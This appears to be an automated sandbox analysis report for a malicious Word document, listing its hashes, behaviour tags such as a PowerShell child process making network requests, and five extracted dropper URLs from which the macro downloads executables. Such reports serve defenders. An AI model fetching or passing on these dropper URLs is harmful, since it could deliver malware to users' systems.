Overview

overview

10

Static

static

1

e62a45cabe...18.doc

windows7-x64

10

e62a45cabe...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    e62a45cabe2092469274c14bd4f44705_JaffaCakes118

  • Size

    197KB

  • Sample

    240917-gf7lasxerk

  • MD5

    e62a45cabe2092469274c14bd4f44705

  • SHA1

    87801790127af2bc2b871578566786269935f129

  • SHA256

    b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b

  • SHA512

    155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169

  • SSDEEP

    3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kantova.com/DWTr10bVVLjs5r
exe.dropper

http://www.hjsanders.nl/889KycAhSPlXPbrS
exe.dropper

http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW
exe.dropper

http://bozziro.ir/YENtfKb77bgd_Gk
exe.dropper

http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ

Targets

    • Target

      e62a45cabe2092469274c14bd4f44705_JaffaCakes118

    • Size

      197KB

    • MD5

      e62a45cabe2092469274c14bd4f44705

    • SHA1

      87801790127af2bc2b871578566786269935f129

    • SHA256

      b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b

    • SHA512

      155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169

    • SSDEEP

      3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

    Score
    10/10
    discoveryexecution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks